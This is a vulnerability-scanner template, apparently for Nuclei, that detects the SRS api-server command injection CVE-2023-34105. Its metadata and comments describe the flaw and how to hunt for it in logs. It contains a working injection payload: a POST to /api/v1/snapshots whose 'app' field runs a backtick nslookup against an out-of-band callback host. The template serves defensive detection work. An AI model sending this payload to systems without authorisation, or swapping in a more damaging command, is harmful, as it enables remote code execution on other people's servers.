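# Detection template for CVE-2023-34105 (command injection in the SRS
# api-server). The structure below restores the nesting that the page
# rendering flattened; every key and value is unchanged from the page.
id: CVE-2023-34105

info:
  name: SRS - Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  # Affected ranges as stated by the template author. Fixed releases are not
  # listed here; take them from the advisory in `reference` when planning the
  # upgrade.
  description: |
    SRS's v5.0.137~v5.0.156, v6.0.18~v6.0.47 api-server server is vulnerable to a drive-by command injection.
  reference:
    - https://github.com/ossrs/srs/security/advisories/GHSA-vpr5-779c-cx62
    - https://github.com/ossrs/srs/blob/1d11d02e4b82fc3f37e4b048cff483b1581482c1/trunk/research/api-server/server.go#L761
  classification:
    # UI:R and AC:H in the vector are consistent with the "drive-by" wording
    # in the description.
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-34105
    cwe-id: CWE-77,CWE-78
    epss-score: 0.01543
    epss-percentile: 0.8742
    cpe: cpe:2.3:a:ossrs:simple_realtime_server:*:*:*:*:*:*:*:*
  metadata:
    vendor: ossrs
    product: simple_realtime_server
    shodan-query: http.favicon.hash:1386054408
    verified: true
    max-request: 1
  tags: cve,cve2023,srs,rce,oast

http:
  # This is an active check: a vulnerable host runs the `nslookup` in the
  # `app` field, and the resulting DNS lookup is observed out of band (OAST).
  # Defenders can hunt for the same pattern in API and proxy logs: POST
  # requests to /api/v1/snapshots whose JSON `app` value contains backticks
  # or other shell metacharacters.
  - raw:
      - |
        POST /api/v1/snapshots HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"action": "on_publish", "app": "`nslookup {{interactsh-url}}`", "stream":"foo", "vhost": "foo", "client_id":"foo"}

    # All four matchers must hold. Because the DNS callback is mandatory, a
    # vulnerable host that cannot resolve external names (egress or DNS
    # filtering) produces no finding; a clean result is not proof of a patched
    # server.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS interaction
        words:
          - "dns"

      # The response must carry both JSON fragments.
      - type: word
        part: body
        words:
          - '{"code":'
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# NOTE(review): the digest trailer below appears to be the template signature;
# it is expected to stop matching once the template text is edited, so re-sign
# before relying on it.
# digest: 4b0a0048304602210086426218b97c1124bfea5c9edb839b7072481e332faf7cef3cae4fb385bfc00b022100be07f50cee9dc39500ae2de6f3c45b63a91d2b93b095d6ed3cc43cb7678e853f:922c64590222798bb761d5b6d8e72950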